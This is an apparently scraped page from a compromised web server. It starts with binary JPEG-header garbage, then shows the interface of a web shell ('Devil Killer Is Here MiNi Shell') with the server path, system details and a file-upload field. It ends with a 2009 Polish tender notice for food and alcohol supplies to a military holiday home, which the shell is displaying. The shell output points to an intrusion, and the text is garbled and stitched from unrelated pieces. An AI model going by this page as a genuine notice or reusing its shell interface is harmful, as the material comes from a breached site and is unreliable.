JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090315/62600-N-2009.html

<p class="kh_header"><b>Unieście: Dostawy artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim</b><br>
<b>Numer ogłoszenia: 62600 - 2009; data zamieszczenia: 15.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Dom Wypoczynkowy , ul. Suriana 24, 76-032 Unieście, woj. zachodniopomorskie, tel. 094 3481921, faks 094 3481921.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wdw.afr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim,  według podziału na pakiety (zadania):
 	
1) Zadanie nr 1 artykułów spożywczych, CPV: 15.80.00.00-6;
2) Zadanie nr 2 drobiu, CPV: 15.13.15.00-0; 
3) Zadanie nr 3 pieczywa, CPV: 15.81.10.00-6;
4) Zadanie nr 4 napoje i soki , CPV: 15.98.20.00-5;
5) Zadanie nr 5 soki, CPV: 15.32.00.00-7;
6) Zadanie nr 6 ryby, CPV: 03.31.10.00-2;
7) Zadanie nr 7 ciasta i wyroby ciastkarskie CPV: 15.81.20.00-3;
8) Zadanie nr 8 piwo CPV: 15.96.10.00-2;
9) zadanie nr 9 napoje alkoholowe CPV: 15.91.00.00-0.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.13.15.00-0, 15.81.10.00-6, 15.98.20.00-5, 15.32.00.00-7, 03.31.10.00-2, 15.81.20.00-3, 15.96.10.00-2, 15.91.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia jest zobowiązany wnieść wadium przed upływem terminu składania ofert w wysokości 3% wartości zamówienia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia,

3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ustawy.

Ocena spełniania warunków udziału w postępowaniu przez Wykonawców , będzie
dokonana w oparciu o kompletność i prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów , jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły : spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia oraz dokumenty potwierdzające spełnienie warunków:

a) Oświadczenie o spełnieniu warunków art. 22 ust. 1 ustawy, wg wzoru określonego w załączniku nr 2;
W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu.
   

b) Dokument potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy. Dokumenty winny być poświadczone za zgodność z oryginałem przez osoby upoważnione ze strony pełnomocnika reprezentującego Wykonawców w postępowaniu.


c) Oświadczenie wykonawcy lub zaświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub właściwej Kasy Rolniczego Ubezpieczenia Społecznego;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wdw.afr.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowy Dom Wypoczynkowy w Unieściu, 76 - 032 Unieście, ul. Suriana 24, budynek administracyjny, pok. 105..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 10:00, miejsce: Wojskowy Dom Wypoczynkowy w Unieściu, 76 - 032 Unieście, ul. Suriana 24, budynek administracyjny, pok. 105..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim - Zadanie nr 1 dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rodzynki	kg	20
2	Miód naturalny	kg	60
3	Cukier	kg	3400
4	Koncentrat pomidorowy 30% (op. 4- 5 kg)	kg	500
5	Dżem - różne smaki (op. 6,5 - 7 kg)	kg	1800
6	Papryka konserwowa (op. 0,9l.)	kg	400
7	Kukurydza konserwowa  (op. 3,1 l.)	kg	170
8	Groszek konserwowy  (op. 3,1 l.)	kg	200
9	Ogórek konserwowy	kg	500
10	Szczaw konserwowy	kg	30
11	Fasola konserwowa szparagowa 
 (op. 3,1 l.)	kg	80
12	Fasola konserwowa czerwona  (op. 3,1 l.)	kg	100
13	Brzoskwinia konserwowa  (op. 0,850 l.)	kg	80
14	Ananas konserwowy - plastry  (op. 3,1 l.)  	kg	200
15	Pieczarki marynowane  (op. 0,9 l.)	kg	220
16	Szparagi konserwowe	kg	20
17	Cebulka konserwowa	kg	20
18	Oliwki konserwowe	kg	40
19	Krem nutella	kg	110
20	Koncentrat soku owocowego 
(op. 6-6,5 kg)	kg	1800
21	Olej 	kg	1200
22	Mąka koszalińska (lub równoważna)	kg	1900
23	Mąka ziemniaczana	kg	30
24	Płatki owsiane	kg	190
25	Płatki kukurydziane	kg	290
26	Kasza manna	kg	180
27	Kasza jęczmienna	kg	250
28	Kasza gryczana	kg	120
29	Ryż długoziarnisty	kg	720
30	Sól	kg	1400
31	Herbata expresowa 15 g Saga  
(lub równoważna)	szt	170.000
32	Herbata Lipton saszetki	szt	2000
33	Makaron różny (op. 2,5 - 3 kg)	kg	1100
34	Kakao 	kg	50
35	Śliwka kalifornijska	kg	60
36	Ketchup Włocławek (lub równoważny)	kg	700
37	Chrzan tarty	kg	30
38	Ćwikła z chrzanem	kg	8
39	Musztarda (op. 5 kg)	kg	550
40	Ocet	kg	60
  41	Przyprawa do zup w płynie Winiary
(op. 3-5 kg)  - lub równoważna 	kg	300
  42	Przyprawa Jarzynka	kg	60
  43	Pieprz naturalny	kg	35
  44	Majeranek	kg	10
  45	Papryka mielona słodka	kg	10
  46	Ziele angielskie	kg	10
  47	Kwasek cytrynowy	kg	10
  48	Zupa pieczarkowa	kg	42
  49	Sos myśliwski	kg	25
  50	Sos grzybowy	kg	30
  51	Sos pieczeniowy	kg	5
  52	Majonez	kg	550
  53	Kompot owocowy (op. 0,9 l.)	kg	1400
  54	Kawa naturalna Premium 
(lub równoważna)	kg	130
  55	Kawa rozpuszczalna Jakobs 
(lub równoważna)	kg	150
  56	Barszcz czerwony w proszku	kg	54
  57	Napój herbaciany	kg	50
  58	Cukier waniliowy	kg	10
  59	Czosnek granulowany	kg	18
  60	Liść laurowy	kg	5
  61	Przyprawa do grilla	kg	40
  62	Przyprawa ziołowa	kg	5
  63	Przyprawa do mięs	kg	1
  64	Przyprawa do ryb	kg	1
  65	Przyprawa do drobiu	kg	1
  66	Przyprawa do bigosu	kg	1
  67	Cukier puder	kg	10
  68	Żurek	kg	65
  69	Cynamon	kg	2
  70	Żelatyna spożywcza	kg	45
  71	Pasztet drobiowy 135g.	szt	4500
  72	Konserwa mięsna 110g.	szt	2000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim - Zadanie nr 2 dostawa drobiu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z piersi kurczaka mrożony 
( bez kostki )	kg	755
2	Kurczak mrożony	kg	520
3	Udka z kurczaka mrożone	kg	5200
4	Pałki z kurczaka mrożone	kg	170
5	Porcje rosołowe z kurczaka mrożone	kg	1400
6	Wątróbka z kurczaka mrożona	kg	150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.15.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim -   Zadanie nr 3 dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb zwykły 0,5 kg	szt	23000
2	Chleb razowy 0,4 kg	szt	2000
3	Bułka kajzerka	szt	83000
4	Bułka poznańska	szt	5500
5	Chleb - Waza (żurek) - 300g.	szt	2000
6	Chleb - Koszyk	szt	10
7	Chleb - Taca	szt	40
8	Bułka tarta	kg	450.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim -  
Zadanie nr 4 napoje.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Napój Coca cola   0,5 l.	szt	600
2	Napój Coca cola   1 l.	szt	800
3	Napój Coca cola  2 l.	szt	200
4	Napój Fanta 0,5 l.	szt	200
5	Napój Fanta 1 l.	szt	200
6	Napój Fanta 2 l.	szt	100
7	Napój Sprite 0,5 l.	szt	200
8	Napój  Sprite 1 l.	szt	200
9	Napój Sprite 2 l.	szt	100
10	Woda Kropla Beskidu 0,5 l.	szt	100
11	Woda Kropla Beskidu 1,5 l.	szt	100
12	Napój Nestea 0,5 l.	szt	600
13	Lift  2l.	szt	100
14	Power cytrynowy 0,5 l.	szt	100
15	Napój gazowany - pomarańczowy1,5 l.	szt	150
16	Napój gazowany - oranżada 1,5 l.	szt	150
17	Napój gazowany - cytryna  1,5 l.	szt	150
18	Napoje gazowane 
( różne smaki) 1,5 l.	szt	150
19	Napój gazowany - pomarańczowy   2 l.	szt	200
20	Napój gazowany - oranżada  2 l.	szt	200
21	Napój gazowany - cytryna 2 l.	szt	200
22	Napoje gazowane (różne smaki)  2 l.	szt	200
23	Napój niegazowany -pomarańczowy   1,5 l.	szt	150
24	Napój niegazowany -jabłkowy     1,5 l.	szt	150
25	Napój niegazowany -winogronowy1,5 l.	szt	150
26	Napoje niegazowane (różne smaki )     1,5 l.	szt	150
27	Napój niegazowany - pomarańczowy      2 l.	szt	200
28	Napój niegazowany - jabłkowy         2 l.	szt	200
29	Napój niegazowany - winogronowy 2 l.	szt	200
30	Napoje niegazowane (różne smaki )   2 l.	szt	200
31	Woda mineralna gazowana        0,5 l.	szt	1100
32	Woda mineralna gazowana        1,5 l.	szt	1000
33	Woda mineralna niegazowana    0,5 l.	szt	1500
34	Woda mineralna niegazowana    1,5 l.	szt	1500
35	Woda mineralna niegazowana       5 l.	szt	150
36	Woda smakowa 
1 l.	szt	300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.20.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim -  
Zadanie nr 5 soki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sok jabłkowy 1 l.	szt	400
2	Sok pomarańczowy 1 l.	szt	400
3	Sok czarna porzeczka 1 l.	szt	200
4	Sok grapefruit 1 l.	szt	300
5	Sok wiśniowy 1 l.	szt	100
6	Sok winogronowy 1 l.	szt	120
7	Sok jabłkowy 2 l.	szt	100
8	Sok pomarańczowy 
2 l.	szt	100
9	Sok czarna porzeczka 2 l.	szt	100
10	Sok grapefruit 2 l.	szt	100
11	Sok wiśniowy 2 l.	szt	100
12	Sok winogronowy 2 l.	szt	100
13	Sok multiwitamina 2 l.	szt	100
14	Soki owocowe 
0,2 l.	szt	500
15	Sok Tymbark lub równoważny 0,250 l.	szt	400
16	Sok Kubuś lub równoważny 
0,33 l. 	szt	200
17	Sok Kubuś lub równoważny 
0,7 l.	szt	100
18	Sok pomidorowy 0,33 l.	szt	50
19	Sok pomidorowy 
1 l.	szt	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim - Zadanie nr 6 ryby.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z dorsza świeżego	kg	700
2	Śledź Matjas	kg	80
3	Filet z pangi	kg	1000
4	Makrela wędzona	kg	20
5	Pstrąg świeży	kg	160
6	Łosoś świeży	kg	30
7	Łosoś wędzony	kg	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim -
 Zadanie nr 7 ciasta i wyroby ciastkarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ciasto drożdżowe	kg	300
2	Drożdżówki różne	szt	18000
3	Pączki	szt	5000
4	Sernik	kg	300
5	Jabłecznik	kg	300
6	Keks	kg	300
7	Makowiec	kg	300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim -
 
Zadanie nr 8 piwo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Żywiec but. 0,5 l.	szt	800
2.	Żywiec puszka. 0,5 l.	szt	2250
3.	Warka Jasne Pełne  but.  0,5 l.	szt	260
4.	Warka Strong but.  0,5 l.	szt	420
5.	Warka Jasne Pełne puszka  0,5 l.	szt	1600
6.	Warka Strong puszka  0,5 l.	szt	1500
7.	Heineken puszka  0,5 l.	szt	48
8.	Lech Premium but.  0,5 l.	szt	800
9.	Lech Mocny but.  0,5 l.	szt	180
10.	Lech Mocny puszka  0,5 l.	szt	72
11.	Lech Premium puszka  0,5 l.	szt	2000
12.	Lech Premium Kega  30 l.	szt	810
13.	Redds smakowy but.  0,5 l.	szt	120
14.	Redds smakowy puszka  0,5 l.	szt	580
15.	Dębowe but.  0,5 l.	szt	400
16.	Dębowe puszka  0,5 l.	szt	1300
17.	Dock in de Fog  but.  0,5 l.	szt	24
18.	Dock in de Fog  puszka  0,5 l.	szt	24
19.	Tyskie but.  0,5 l.	szt	1100
20.	Tyskie puszka  0,5 l.	szt	3600
21.	Tyskie Kega 50 l.	szt	1390
22.	Dojlidy Żubr puszka   0,5 l.	szt	1140
23.	Połczyn  puszka  0,5 l.	szt	100
24.	Połczyn puszka  0,5 l.	szt	180
25.	Okocim Mocne but.  0,5 l.	szt	192
26.	Carlsberg puszka  0,5 l.	szt	550
27.	Sambor but.  0,5 l.	szt	80
28.	Sambor puszka  0,5 l.	szt	290
29.	Faxe Premium but.  0,5 l.	szt	60
30.	Faxe Premium puszka  0,5 l.	szt	60
31.	Faxe Extra Strong but.  0,5 l.	szt	20
32.	Faxe Extra Strong puszka  0,5 l.	szt	20
33.	Strzelec Mocne puszka  0,5 l.	szt	24
34.	Strzelec Jasne Pełne but.  0,5 l.	szt	20
35.	Karmi but.  0,5 l.	szt	60
36.	Cooler Lemon puszka  0,5 l.	szt	24
37.	Gingers Imbir but.  0,5 l.	szt	48
38.	Cristal Ice  but.  0,33 l.	szt	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.96.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa artykułów spożywczych dla potrzeb Wojskowego Domu Wypoczynkowego w Unieściu i Kompleksu Wypoczynkowego w Ustroniu Morskim - 
Zadanie nr 9 napoje alkoholowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Adwokat 
0,7 l.	szt	10
2.	Brandy hobson 0,7 l.	szt	10
3.	Budafok 
0,7 l.	szt	5
4.	Carignac brandy 0,7 l.	szt	5
5.	Gin lubuski 
0,7 l.	szt	15
6.	Hennessy fine cognac 0,7 l.	szt	10
7.	Hennessy vs cognac  0,7 l.  	szt	10
8.	Johnie walker blue 0,7 l.	szt	3
9.	Johnie walker gold 0,7 l.	szt	5
10.	Johnie walker green 0,7 l.	szt	5
11.	Johnie walker black 0,7 l.	szt	30
12.	Johnie walker red 0,7 l.	szt	20
13.	Le chevalier noir 0,7 l.	szt	5
14.	Le cuvier brandy 0,7 l.	szt	5
15.	Les armes 
0,7 l.	szt	5
16.	Likier Malibu 
0,5 l.	szt	15
17.	Pliska brandy 0,5 l.	szt	10
18.	Robespierre brandy  0,7 l.	szt	5
19.	Rum seniorita 0,5 l.	szt	30
20.	Stock brandy  0,7 l.	szt	30
21.	Szmpan muskat rose 0,75 l.	szt	5
22.	Słoneczny brzeg  0,5 l.	szt	10
23.	Whisky ballantines 0,5 l.	szt	10
24.	Whisky ballantines 0,7 l.	szt	10
25.	Whisky jack daniels 0,7 l.	szt	5
26.	Whisky old sougler 0,7 l.	szt	5
27.	Whisky passport 0,7 l.	szt	5
28.	Whisky willams 0,7 l.	szt	5
29.	Wino campari  0,7 l.	szt	15
30.	Wino martini  0,7 l.	szt	15
31.	Wódka absolwent 0,2 l.	szt	50
32.	Wódka absolwent 0,5 l.	szt	50
33.	Wódka bols 
0,5 l.	szt	150
34.	Wódka bols 
0,7 l.	szt	30
35.	Wódka maximus 0,5 l.	szt	300
36.	Wódka maximus 0,7 l.	szt	100
37.	Wódka wyborowa 0,5 l.	szt	60
38.	Wódka finlandia 0,5 l.	szt	60
39.	Wódka finlandia 0,7 l.	szt	30
40.	Wódka finlandia cranberry 0,7 l.	szt	5
41.	Wódka finlandia  grapefruit 0,7 l.	szt	5
42.	Wódka finlandia redberry  0,7 l.	szt	5
43.	Wódka absolut kurant 0,5 l.	szt	10
44.	Wódka absolut kurant   0,7 l.	szt	10
45.	Wódka absolut  0,5 l.	szt	10
46.	Wódka absolut 0,7 l.	szt	10
47.	Wódka absolut raspberri 0,7 l.	szt	5
48.	Wódka krakowska 0,5 l.	szt	40
49.	Wódka luksusowa 0,5 l.	szt	30
50.	Wódka starogardzka 0,2 l.	szt	40
51.	Wódka starogardzka 0,5 l.	szt	30
52.	Wódka smirnoff 0,5 l.	szt	60
53.	Wódka wisent  0,5 l.	szt	30
54.	Wódka Żubrówka 0,5 l.	szt	45.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.91.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

